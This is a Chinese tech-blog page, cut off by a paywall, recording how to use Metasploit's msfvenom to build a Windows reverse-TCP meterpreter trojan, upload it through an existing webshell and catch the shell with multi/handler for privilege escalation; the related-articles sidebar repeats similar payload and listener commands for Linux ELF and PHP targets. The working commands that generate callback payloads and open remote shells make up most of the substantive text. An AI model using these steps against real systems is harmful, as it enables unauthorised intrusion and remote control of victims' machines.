msf制作木马反弹shell提权

最新推荐文章于 2025-03-08 23:17:40 发布
最新推荐文章于 2025-03-08 23:17:40 发布
阅读量2.2k 收藏 5
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Shinyhuang_/article/details/121117143
版权
本文档详细记录了如何在拥有webshell权限的环境中,通过kali Linux上的msf生成exe类型的反弹shell木马,并将其上传到目标系统。在kali上设置监听,等待目标执行木马后,成功建立meterpreter会话,进行权限提升,查看目标主机信息,控制屏幕及执行命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

记录一下目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。方便以后查看

启动kali中的msf

┌──(root💀SC)-[~]
└─# msfconsole

生成exe类型反弹型木马,LHOST=kali的ip

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
msf6 >

将shell.exe木马通过冰蝎连接的webshell上传至目标

在kali的msf中开启监听4444端口

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/m
最低0.47元/天 解锁文章
a11aron
关注
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1821
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
反弹shell---生成木马反弹shell(Windows)
weixin_50956890的博客
05-04 4375
Windows反弹shell的一种方式--生成木马
msf反弹shell
weixin_34179762的博客
05-15 1064
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
利用msf实现反弹shell(细节过程秒懂)
Naiisii的博客
01-13 6489
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
反弹shell原理与实现
最新发布
没有网络安全就没有国家安全
03-08 918
反弹shell原理与实现
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4827
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 887
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
FRP+MSF+注入反弹shell
dahege666的博客
04-21 4319
实验环境: XXX云ECS一台:x.x.x.x 内网kali控制端:192.168.250.133 外网注入后台win7主机: 操作步骤: 分别在XXX云ECS、内网kali控制端搭建frp 具体方法参见: 安装frp_叶孤心丶的博客-优快云博客_frp安装 配置 内网kali控制端配置 vi frpc.ini XXX云ECS配置 vim frps.ini 启动FRP 本地Kali linux 启动 FRP ./frpc -c ./f...
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 6184
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
云服务器msf跨域反弹shell
iuyoo的博客
03-29 6112
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
cmd反弹shell
10-24
cmd反弹shell
Windows---MSF/令牌窃取/系统服务限配置错误
qq_40012781的博客
07-02 2475
是指把普通用户的限进行升至高限的过程,也叫特
红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]
跟我加入白帽大家庭,共捍亿万互联网用户安全!
12-03 1344
如何通过制作windows和linux客户端恶意软件进行渗透MS模块命令使用方法等具体操作详解步骤等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
初学MSF之渗透、、免杀(上)
qq_53058639的博客
08-01 2357
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
使用MSF进行(windows、linux、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1368
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
使用MSF进行(windows、linux、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows 靶机: Win server2003 + iis(已.
什么是木马反弹木马
ciahi的专栏
09-02 5408
什么是木马?特洛伊木马(以下简称木马),英文叫做“  Trojan house”  ,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“  马”  兴叹。 所谓非授性是指一旦控制端与服务端连接后,控制端将享有服
msf生成Linux反弹shell
02-23
### 使用 Metasploit Framework 生成 Linux 反弹 Shell Payload 为了生成适用于 Linux 系统的反弹 shell payload,可以利用 Metasploit 中供的 `msfvenom` 工具来创建所需的恶意负载。以下是具体方法: #### 准备工作 确保已经安装并配置好 Kali Linux 和 Metasploit Framework。 #### 创建反弹 Shell Payload 通过命令行工具 `msfvenom` 来构建适合目标系统的 payload 文件。对于 Linux 平台而言,可以选择多种类型的 payload;这里以常见的 TCP 反弹 shell (`linux/x86/meterpreter/reverse_tcp`)为例[^2]。 ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=本地IP地址 LPORT=监听端口 -f elf > shell.elf ``` 此命令会生成一个 ELF 格式的二进制文件 `shell.elf`,其中包含了设置好的反向连接参数(即攻击者的 IP 地址和端口号)。当受害者执行该文件时就会触发反弹 shell 行为[^1]。 #### 设置 Metasploit 进行接收 启动 msfconsole 后加载相应的 exploit 模块,并设定相同的 Local Host (LHOST) 和 Port Number (LPORT),以便能够接收到从受害主机发来的连接请求。 ```ruby use multi/handler set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 本地IP地址 set LPORT 监听端口 exploit -j -z ``` 上述操作完成后,在等待一段时间之后应该可以看到 Meterpreter session 成功建立起来,从而实现远程控制目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值